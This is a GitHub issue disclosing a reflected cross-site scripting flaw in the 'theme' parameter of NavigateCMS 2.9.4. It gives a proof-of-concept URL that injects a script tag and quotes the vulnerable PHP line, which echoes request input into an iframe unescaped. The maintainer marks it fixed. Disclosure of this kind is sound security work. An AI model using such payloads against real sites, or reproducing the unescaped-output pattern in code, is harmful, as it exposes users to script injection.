Reflected XSS attack in \lib\packages\themes\themes.php with the theme parameter in NavigateCMS 2.9.4 - Githubissues

NavigateCMS / Navigate-CMS

Navigate CMS, a very powerful open source content management system for everybody.

http://www.navigatecms.com

GNU General Public License v2.0

8 stars 4 forks source link

Reflected XSS attack in \lib\packages\themes\themes.php with the theme parameter in NavigateCMS 2.9.4 #29

Closed bkfish closed 2 years ago

bkfish commented 2 years ago

EXPECTED BEHAVIOUR

An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the themes feature.

exp

/navigate/navigate.php?fid=themes&act=theme_info&theme=%22%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E

analysis

navigate\lib\packages\themes\themes.php line17 without any filter.

 case 'theme_info':
            echo '<iframe src="'.NAVIGATE_URL.'/themes/'.$_REQUEST['theme'].'/'.$_REQUEST['theme'].'.info.html'.'" scrolling="auto" frameborder="0"  width="100%" height="100%"></iframe>';
            core_terminate();
            break;

NavigateCMS commented 2 years ago

Fixed by dd2cef6c6bdb2b4dd4b2bf3b813bd8489bc23947